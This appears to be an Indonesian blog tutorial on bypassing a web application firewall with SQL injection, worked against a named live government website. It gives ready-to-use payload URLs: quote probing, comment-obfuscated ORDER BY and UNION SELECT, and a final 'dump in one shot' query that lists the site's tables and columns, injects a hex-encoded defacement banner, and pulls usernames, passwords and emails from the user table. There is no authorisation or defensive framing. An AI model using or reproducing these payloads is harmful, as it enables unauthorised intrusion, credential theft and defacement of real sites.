Sqli bypass Waf 403

Halo gan, welcome!!

         Yo gan langsung saja ya, pertama kita siapkeun dlu bahan bahannya:
1. Koneksi internet
2. Browser
3. Live target
4. Kopi dan otak
Oke disini saya sudah menyiapkan live target, yaitu 
http://jdih.madiunkab.go.id/ yak, siapin otak kalian

Step 1: mencari inject point.
        Cara mencari inject point dalam sqli yaitu bisa dengan view source atau mengklik directory lain dalam web tersebut. Disini saya sudah mendapatkannya di parameter detail produk

Step kedua: kutip(')
         Yak, setelah inject point kita akan mengetahui web tersebut vuln injeksi sql dengan tanda kutip(') atau dengan (/**). Disini kita pakai tanda kutip('). Cara mengetahui web itu vuln atau tidak yakni dengan berubahnya tampilan web atau ada tulisan 
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in
Dan lain lain

Step ketiga: order by
      Setelah mengetahui webnya vuln langsung kita order by.
Langsung aja, disini kita akan bypass waf, tambahkan and true setelah kutip dan bypass order by nya, seperti:
http://jdih.madiunkab.go.id/?hal=detailprodukhukum&id=2017010007%27and%20true%20/*!12345ORDER*/%20/*!BY*/%201--%20- (ga error)

Dan yak, berubah kembali seperti tampilan awal, lgsg kita cari tab vulnnya, saya akan lgsg ke error aja
http://jdih.madiunkab.go.id/?hal=detailprodukhukum&id=2017010007%27and%20true%20/*!12345ORDER*/%20/*!BY*/%2010--%20- (error)
Oke kita dah tau errornya, langsung kita union select, step selanjutnya

Step ke empat: Union select
      Pada step ini kita akan mencari angka ajaibnya:v , dalam step ini tambahkan character(-) sebelum parameter id dan bypass union selectnya, seperti
http://jdih.madiunkab.go.id/?hal=detailprodukhukum&id=-2017010007%27%20and%20true%20%23xyz%0AUnIOn%23xyz%0ASeLecT%201,2,3,4,5,6,7,8,9--%20-

Tampilannya akan seperti ini













Yak itu dia angka ajaibnya, banyak kan:v , itulah tempat naro dios dan hexanya pada angka tersebut, yak ini solved gua. Untuk dios kalian bisa cari di google dan untuk hex kalian hex html kalian di: https://www.online-toolz.com/tools/text-hex-convertor.php
http://jdih.madiunkab.go.id/?hal=detailprodukhukum&id=-2017010007%27%20and%20true%20%23xyz%0AUnIOn%23xyz%0ASeLecT%201,concat(0x3c62723e3c62723e3c696d67207372633d2268747470733a2f2f692e6962622e636f2f677a47467179472f476c697463682d43616d2d32303139313231322d3233313731323836352e6a7067222077696474683d22343030707822206865696768743d223430307078223e3c62723e3c62723e3c68313e496e6a6563746564206279202e2f44346e7a58303c2f68313e3c617564696f206175746f706c61793d226175746f706c61792220636f6e74726f6c733d22636f6e74726f6c73222069643d226c61677522207372633d2268747470733a2f2f672e746f7034746f702e696f2f6d5f313433386f63387569312e6d70332220747970653d22617564696f223e3c2f617564696f3e,version(),0x3c62723e,user(),0x3c62723e,database(),0x3c62723e,@@hostname,0x3c62723e,@@tmpdir,0x3c62723e,@@datadir,0x3c62723e,@@basedir,0x3c62723e,schema(),0x3c62723e,session_user(),0x3c62723e,UUID(),0x3c62723e,current_user(),0x3c62723e,system_user(),0x3c62723e,@@GLOBAL.have_symlink,0x3c62723e,@@GLOBAL.have_ssl,0x3c627232e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),3,4,5,group_concat(username,0x3a,password,0x3a,email,0x3a,level),7,8,9%20from%20user--%20-

Yak sekian terimakasih
By: ./D4nzX0

Post a Comment

Previous Post Next Post